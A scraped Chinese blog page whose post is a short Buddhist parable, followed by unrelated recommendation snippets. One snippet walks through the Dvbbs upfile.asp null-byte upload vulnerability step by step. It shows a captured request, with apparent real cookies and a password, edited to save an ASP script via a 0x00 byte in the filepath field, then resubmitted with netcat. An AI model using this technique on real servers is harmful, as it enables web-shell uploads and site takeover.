生死无惧

最新推荐文章于 2025-04-29 17:46:56 发布
原创 最新推荐文章于 2025-04-29 17:46:56 发布 · 929 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

曾经有一位大圆满行者,他不喜欢夸耀自己,却有一大堆弟子跟着他修行。有一个喜欢卖弄学问的僧人非常嫉妒他,他知道这位行者书读得不多,就想:“他只是个平凡人,怎敢去教导别人?他怎敢假装成老师?我要去考考他,好教他当面出丑,让他在弟子面前丢脸,这样他们就会背弃他而跟随我了。”

有一天,他前往拜访这位行者,且轻蔑地说:“你们这些修大圆满的人,难道只会修禅?”

行者的回答让他吃了一惊:“要修什么禅?”

“原来你根本就不修禅!”僧人得意扬扬地大嚷着。

“不过,我什么时候心乱过了?”行者回答。

 

flashzlm
关注
无惧上传类 Version V1.2
06-18
自从用ASP来编写网站,就无时无刻想找一种兼容性强,使用方便的上传方法,用过很多的无 组件上传方法,但是都存在使用不方便,兼容性差,速度慢等的问题。终于在2003年的元旦里,想 到了可以让上传文件达到最快的方法,经过10天的努力,整整10个版本的版本的更新,终于完成了这一个“无惧上传类V1.0”,这个版本与其它的上传类或方法相比,具有速度快,兼容性强, 使用方便等特点。
先锋无组件上传类(无惧2.0杜绝上传漏洞修改版) v2004
12-08
上传漏洞终结篇 一、写在前面 ***这个上传漏洞利用的原理只是针对form格式上传的asp和php脚本*** NC(Netcat)   用于提交数据包   DOS界面下运行:   NC -vv www.***.com 80<1.txt   -vv: 回显   80: www端口   1.txt: 就是你要发送的数据包  (更多使用方法请查看本区的帖子) WSE(WSockExpert)   对本机端口的监视,抓取IE提交的数据包  (不会用的就自己到网上搜资料N多) 二、漏洞原理 下面例子假设的前提 www主机: www.***.com; bbs路径 : /bbs/ 漏洞源于对动网上传文件的研究,建议有一定编程经验的 看看Dvbbs的upfile.asp文件,没有必要全部看懂 upfile是通过生成一个form表上传,如下 <form name="form" method="post" action="upfile.asp" ...> <input type="hidden" name="filepath" value="uploadFace"> <input type="hidden" name="act" value="upload"> <input type="file" name="file1"> <input type="hidden" name="fname"> <input type="submit" name="Submit" value="上传" ...></form> 用到的变量: filepath 默认值uploadface 属性hiden act   默认值upload   属性hiden file1  就是你要传的那个文件 关键是 filepath 这个变量! 默认情况下我们的文件上传到www.***.com/bbs/uploadface/ 文件是用你的上传时间命名的,就是upfile里的这一句 FileName=FormPath&year(now)&month(now)&day(now)&hour(now)&minute(now)&second(now)&ranNum&"."&FileExt ------------------------------------------------------------------------- 我们知道计算机里面的数据是一"\0"为标致的用过C语言的都知道 char data[]="bbs" 这个data数组长度是4: b b s \0 如果我们构造filepath如下,会怎么样呢? filepath="/newmm.asp\0" 我们在2004.09.24.08.24传的文件就会发生变化 没有改时: http://www.***.com/bbs/uploadface/200409240824.jpg 用我们构造的filepath时: http://www.***.com/newmm.asp\0/200409240824.jpg 这样当服务器接收filepath数据时,检测到newmm.asp后面的\0 就理解为filepath的数据就结束了 这样我们上传的文件,比如c:\1.asp 就保存成: http://www.***.com/newmm.asp 三、后期补充 漏洞公布以后很多网站做了相应的处理,但是对于filepath的过滤和处理都不行 有很多网站只是加了N个hiden属性的变量对付网上公布的upfile.exe就是那个 上传漏洞利用工具或者filepath变量利用工具(老兵的)...但是最基本的没改啊。。 而且很对网站的插件里有类似的漏洞,我要说的不要依赖哪些专门的工具 自己改WSE抓到的包里的filepath变量,然后在用NC提交。。。 就算他加N个hiden变量也于事无补。 当然,如果对filepath做了很严格的过滤的话我们的这些理论就将宣告终结 就是我们的新理论诞生的时候! 四、漏洞列表 http://dvd.3800cc.com/dispbbs.asp?BoardID=20&ID=5369http://dvd.3800cc.com/dispbbs.asp?BoardID=20&ID=5530http://dvd.3800cc.com/dispbbs.asp?BoardID=20&ID=5531http://dvd.3800cc.com/dispbbs.asp?BoardID=20&ID=5693http://dvd.3800cc.com/dispbbs.asp?BoardID=20&ID=5731http://dvd.3800cc.com/dispbbs.asp?BoardID=20&ID=5746 监听外部主机     NC [-options] hostname port[s] [ports] ... 监听本地主机     NC -l -p port [options] [hostname] [port] options:     -d       detach from console, stealth mode     -e prog     inbound program to exec [dangerous!!]     -g gateway   source-routing hop point[s], up to 8     -G num     source-routing pointer: 4, 8, 12, ...     -h       this cruft     -i secs     delay interval for lines sent, ports scanned     -l       listen mode, for inbound connects     -L       listen harder, re-listen on socket close     -n       numeric-only IP addresses, no DNS     -o file     hex dump of traffic     -p port     local port number     -r       randomize local and remote ports     -s addr     local source address     -t       answer TELNET negotiation     -u       UDP mode     -v       verbose [use twice to be more verbose]     -w secs     timeout for connects and final net reads     -z       zero-I/O mode [used for scanning] port numbers can be individual or ranges: m-n [inclusive] 详细实例: --------------------------------------------------------------------------------- 一、WSE抓包结果(存到1.txt里): POST /bbs/upPhoto/upfile.asp HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */* Referer: http://www.xin126.com/bbs/upPhoto/upload.asp Accept-Language: zh-cn Content-Type: multipart/form-data; boundary=---------------------------7d423a138d0278 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322) Host: www.xin126.com Content-Length: 1969 Connection: Keep-Alive Cache-Control: no-cache Cookie: ASPSESSIONIDACCCCDCS=NJHCPHPALBCANKOBECHKJANF; isCome=1; GAMVANCOOKIES=1; regTime=2004%2D9%2D24+3%3A39%3A37; username=szjwwwww; pass=5211314; dl=0; userID=62; ltStyle=0; loginTry=1; userPass=eb03f6c72908fd84 -----------------------------7d423a138d0278 Content-Disposition: form-data; name="filepath" ../medias/myPhoto/ -----------------------------7d423a138d0278 ... ... 上传 -----------------------------7d423a138d0278-- --------------------------------------------------------------------------------- 二、UltraEdit打开1.txt改数据: ...... -----------------------------7d423a138d0278 Content-Disposition: form-data; name="filepath" /newmm.asp█         <===这个黑色代表一个空格是 0x20,改成0x00就可以了 ...... --------------------------------------------------------------------------------- 三、重新计算cookies长度,然后nc提交 Nc -vv www.xin126.com 80 <1.txt UltraEdit是一个16位编辑器网上可以下载得到 我们主要用来写那个结束标致: \0 ====>16位表示:0x00或者00H 其实你改的时候就直接再filepath的结尾处加个00就OK了 计算cookies长度===>你把fillepath改了之后、肯定是或+或—cookies的长度变了 ...... Host: www.xin126.com Content-Length: 1969 <======就是这个 Connection: Keep-Alive Cache-Control: no-cache ...... 计算会吧?一个字母、数字就是1 对于上传漏洞提出的解决思路:(仅供参考) 1、一般的上传是把上传路径作为一个变量来处理 ===>我们的对策就是把filepath变成常量。。。 这个方法是目前最有效的(我认为的) 2、加强对于\0的处理,原来我们是读到这里就结束 我们继续读直道下一个变量开始的地方,处理就OK了
java内嵌浏览器的几种方式
热门推荐
EverythingAtOnce的博客
12-13 2万+
最近遇到一个特殊的项目需求,就是需要在一个屏幕上打开多个窗口大小不同的浏览器、并且显示不同的页面。因为是需要浏览器无边框的,在网上找了好多资料,发现前端好像很难实现。所以就打算采用java后台内嵌浏览器,然后实现无边框的效果。 以下几种就是笔者采用的几种内嵌浏览器方式: 1.Swing + JXBrowser jxBrowser是收费的,我在网上找的破解版 jxbrowser-6.14.j...
论语别裁
JExplorer的专栏
04-20 856
前言回首十五年的岁月,不算太多,但也不少。可是我对于时间,生性善忘,悠悠忽忽,真不知老之将至,现在为了出版这本《论语》讲录,翻检以前的记录,才发觉在这短短的十五年历程中,已经讲过三四次《论语》。起初,完全是兴之所至,由于个人对读的见解而发,并没有一点基于卫道的用心,更没有标新立异的用意。讲过以后,看到同学的笔记,不觉洒然一笑,如忆梦中呓语。“言亡虑绝,事过无痕。”想来蛮好玩的。第一次讲《
身披长夜踏荆而行 《勇者无惧》湖北开播
xxy13944898008的博客
06-07 349
在两江市公安局副局长战国安(李乃文饰)和禁毒总队长旷军(黄俊鹏饰)的指导下,吴惧顺势成为一名卧底深入贩毒集团内部,联手禁毒总队11支队队长安宁(袁雨萱饰),两人以过人的英勇气魄与智慧,在危机四伏的缉毒第一线,与贩毒集团的两大势力万炎斌和“博士”林嘉裕,以及境内外贩毒集团展开了一场惊心动魄的殊死较量,最终一举破获“冰蓝”配方,揪出黑警并成功粉碎贩毒集团,打击了境外贩毒势力,为烈士邹飞宇沉冤昭雪。该剧通过交织的情节和人物设置,将黑与白的较量,利与义的牵扯,善与恶的挣扎、人性的复杂多面展现得淋漓尽致。
网站防护无惧DDoS攻击:2025年实战指南
yundun_no1的博客
04-29 754
DDoS防护是持续演进的过程。对于中小团队,优先采用CDN+高防IP+免费WAF组合;企业级用户需构建“AI监测+边缘计算+弹性架构”的立体防御体系。记住:防御成本永远低于业务中断损失。现在就开始检查你的防护措施,为你的网站穿上2025年的“数字防弹衣”吧!
网站防护如何无惧 DDoS 攻击?2025 年高防方案选型指南与实战推荐
BEST_yundun的博客
04-25 1096
网站防护如何无惧 DDoS 攻击?2025 年高防方案选型指南与实战推荐。
雷军新品发布会猛怼友商,放话“生死看淡、不服就干”
优快云头条
01-14 1725
雷军在刚刚过去的红米note7发布会上直接开“怼”友商,说华为Nova4和荣耀V20目前还是PPT手机,是饥饿销售,并且直言“有本事拿出来卖呀”;至于小米CEO雷军为何会这样做,小宅为大家细细道来。 就在昨日上午,雷军在微博上正式宣布,卢伟冰(金立前副总裁)出任小米集团副总裁兼任Redmi总经理,即掌管独立品牌Redmi。1月2日,雷军在微博上公布了一张与卢伟冰的合影,并配文“欢迎卢伟冰...
亚洲杯16强点兵:伊韩双雄无惧分区 弱队恐难逆袭
weixin_34258838的博客
01-19 169
东道主阿联酋和巴林的球员在比赛中争抢头球。(资料图)图片来源:Osports全体育图片社 中新网客户端北京1月19日电(王禹)经过近两周的激战,2019亚洲杯终于迎来第一个休赛日。然而短暂调整过后,残酷的淘汰赛即将粉墨登场。自古华山一条路,是胜利或者回家,摆在16强面前的,唯有更为残酷的厮杀。首次扩军至24支球队的亚洲杯,在小组赛阶段少了些许惊心动魄。经过了开局的慢热,杯赛逐渐回归强弱分明。尽管比...
雷军推红米Redmi独立品牌喊话友商:生死看淡 不服就干
weixin_34417200的博客
01-10 363
雷帝网 雷建平 1月10日报道小米今日在北京召开独立品牌红米Redmi发布会,并发布该品牌首款产品Redmi Note 7。作为首款产品,Redmi Note 7坚持“死磕性价比”理念,采用4800万超高像素旗舰相机,搭载主频2.2GHz“满血版”骁龙660处理器,并提供18个月超长质保服务,售价999元起。雷军在发布会现场宣布,新近加入小米集团的前金立总裁卢伟冰,担任小米集团副总裁兼红米Redm...
JAVA SWING嵌入IE浏览器控件JExplorer详细介绍
weixin_33672109的博客
06-06 1110
JExplorer控件用于在Swing程序中添加Microsoft Internet Explorer。您可以结合JNIWrapper中的共同特点来使用该类库,尤其是当您需要使用低级Internet Explorer的API函数来深度整合MSHTML和DOM功能时。具体功能:JExplorer具有多种功能特点,方便您在Java程序中整合Internet ExplorerVis...
技术转移服务公司如何借助AI赋能的科技管理服务挖掘服务价值?.docx
12-02
技术转移服务公司如何借助AI赋能的科技管理服务挖掘服务价值?
4G 中的分组调度.zip
最新发布
12-02
1.版本:matlab2014a/2019b/2024b 2.附赠案例数据可直接运行。 3.代码特点:参数化编程、参数可方便更改、代码编程思路清晰、注释明细。 4.适用对象:计算机,电子信息工程、数学等专业的大学生课程设计、期末大作业和毕业设计。
AI时代,市场化技术转移机构面临需求挖掘不精准挑战,如何抓住智能化转型方案机遇实现核心竞争力?.docx
12-02
AI时代,市场化技术转移机构面临需求挖掘不精准挑战,如何抓住智能化转型方案机遇实现核心竞争力?
随着技术迭代加速,政府部门如何利用智能化转型方案应对产业升级?.docx
12-02
随着技术迭代加速,政府部门如何利用智能化转型方案应对产业升级?
【遥感影像处理】基于Google Earth Engine的Landsat9与Sentinel-2多源数据融合:NDWI水体提取与海岸线精细化检测算法实现
12-02
内容概要:本文介绍了如何利用Google Earth Engine(GEE)平台与Python库geemap、xarray等工具,结合Landsat 9和Sentinel-2遥感影像数据,进行水体提取及岸线检测的技术流程。通过定义归一化水体指数(NDWI),对影像集合进行筛选、预处理和中值合成,并使用xarray将Earth Engine的数据导出为本地多维数组格式,进而通过二值化和形态学腐蚀操作识别水体边界,最终实现岸线提取。文中还展示了不同传感器数据的处理差异与可视化方法。; 适合人群:具备遥感图像处理基础知识,熟悉Python编程及地理空间数据分析的科研人员或技术人员;适合环境监测、水利、海洋等相关领域从业者; 使用场景及目标:①用于湖泊、河流等水体范围动态监测;②支持岸线变化分析、洪涝灾害评估等地学研究;③为生态环境保护与国土管理提供技术支撑; 阅读建议:需提前配置好GEE开发环境并完成认证,建议结合代码逐段运行理解数据流,重点关注NDWI计算、影像集合处理、xarray集成与形态学处理的关键实现细节。
基于Matlab的SLAM同步定位与建图算法仿真实战项目
12-02
同步定位与地图构建(SLAM)技术为移动机器人或自主载具在未知空间中的导航提供了核心支撑。借助该技术,机器人能够在探索过程中实时构建环境地图并确定自身位置。典型的SLAM流程涵盖传感器数据采集、数据处理、状态估计及地图生成等环节,其核心挑战在于有效处理定位与环境建模中的各类不确定性。 Matlab作为工程计算与数据可视化领域广泛应用的数学软件,具备丰富的内置函数与专用工具箱,尤其适用于算法开发与仿真验证。在SLAM研究方面,Matlab可用于模拟传感器输出、实现定位建图算法,并进行系统性能评估。其仿真环境能显著降低实验成本,加速算法开发与验证周期。 本次“SLAM-基于Matlab的同步定位与建图仿真实践项目”通过Matlab平台完整再现了SLAM的关键流程,包括数据采集、滤波估计、特征提取、数据关联与地图更新等核心模块。该项目不仅呈现了SLAM技术的实际应用场景,更为机器人导航与自主移动领域的研究人员提供了系统的实践参考。 项目涉及的核心技术要点主要包括:传感器模型(如激光雷达与视觉传感器)的建立与应用、特征匹配与数据关联方法、滤波器设计(如扩展卡尔曼滤波与粒子滤波)、图优化框架(如GTSAM与Ceres Solver)以及路径规划与避障策略。通过项目实践,参与者可深入掌握SLAM算法的实现原理,并提升相关算法的设计与调试能力。 该项目同时注重理论向工程实践的转化,为机器人技术领域的学习者提供了宝贵的实操经验。Matlab仿真环境将复杂的技术问题可视化与可操作化,显著降低了学习门槛,提升了学习效率与质量。 实践过程中,学习者将直面SLAM技术在实际应用中遇到的典型问题,包括传感器误差补偿、动态环境下的建图定位挑战以及计算资源优化等。这些问题的解决对推动SLAM技术的产业化应用具有重要价值。 SLAM技术在工业自动化、服务机器人、自动驾驶及无人机等领域的应用前景广阔。掌握该项技术不仅有助于提升个人专业能力,也为相关行业的技术发展提供了重要支撑。随着技术进步与应用场景的持续拓展,SLAM技术的重要性将日益凸显。 本实践项目作为综合性学习资源,为机器人技术领域的专业人员提供了深入研习SLAM技术的实践平台。通过Matlab这一高效工具,参与者能够直观理解SLAM的实现过程,掌握关键算法,并将理论知识系统应用于实际工程问题的解决之中。 资源来源于网络分享,仅用于学习交流使用,请勿用于商业,如有侵权请联系我删除!
基于遗传算法实现GPS数据点最短路径规划的项目_利用自然数编码机制对一组GPS数据点进行线路顺序排列优化_通过初始化种群计算适应度并应用选择交叉变异算子进行迭代进化以寻找全局近似最.zip
12-02
基于遗传算法实现GPS数据点最短路径规划的项目_利用自然数编码机制对一组GPS数据点进行线路顺序排列优化_通过初始化种群计算适应度并应用选择交叉变异算子进行迭代进化以寻找全局近似最.zip
无惧上传类 V2.2脚本及使用手册发布
无惧上传类 V2.2脚本和使用手册”是一套专为Web开发中文件上传功能设计的解决方案,尤其适用于ASP(Active Server Pages)环境下的服务器端脚本开发。该脚本由作者梁无惧编写,旨在为开发者提供一个高效、安全、...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值